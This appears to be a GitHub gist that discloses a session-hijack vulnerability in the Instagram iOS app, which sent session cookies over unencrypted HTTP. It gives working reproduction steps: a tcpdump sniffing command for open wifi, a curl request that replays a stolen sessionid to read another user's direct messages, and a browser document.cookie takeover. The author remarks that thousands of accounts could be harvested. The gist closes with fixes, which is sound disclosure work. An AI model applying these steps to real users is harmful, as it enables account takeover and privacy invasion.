Created
July 28, 2014 17:41
-
-
Save ybur-yug/9b66b59c1c0b4a79a308 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Instagram iOS session hijack | |
Instagram makes API calls to non-HTTPS endpoints with session cookies in the | |
request headers allowing full session hijack by a malicious actor. | |
Steps to reproduce (on Mac OS X): | |
- Jump on an open or WEP encrypted wifi access point | |
- Put your network interface into promiscuous mode filtering on i.instagram.com | |
<pre> | |
sudo tcpdump -In -i en0 -s 2048 -A dst i.instagram.com | |
</pre> | |
- Wait for someone to use the Instagram iOS app on the same network | |
- Extract cookie request header from the resulting output | |
- Use sessionid cookie parameter to make any api call as that user | |
Even https endpoints like direct messages. | |
<pre> | |
curl -H 'User-Agent: Instagram 6.0.4 (iPhone6,2; iPhone OS 7_1_1; en_GB; en-GB) AppleWebKit/420+' \ | |
-H 'Cookie: sessionid=REDACTED' \ | |
https://i.instagram.com/api/v1/direct_share/inbox/` | |
</pre> | |
This returns the user's direct message inbox as JSON | |
I was able to perform a session hijack on my own account on my laptop while | |
someone else browsed instagram on my iPhone. | |
I was also able to: | |
- take the cookie sniffed from the iOS app | |
- go to instagram.com as an unlogged in user. | |
- set document.cookie = $COOKIE | |
- navigate to a profile | |
- see I'm logged in as that user | |
There is some screwy behaviour where 'instagram.com/' gets into redirect loop, | |
I will see if I can fix that. However going to 'instagram.com/someones_profile' | |
works and shows me as logged in. | |
I think this attack is extremely severe because it allows full session hijack | |
and is easily automated. I could go to the Apple Store tomorrow and reap thousands | |
of accounts in one day, and then use them to post spam. | |
Recommendations: | |
- Use SSL everywhere | |
- Revoke all logged-in sessions? |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment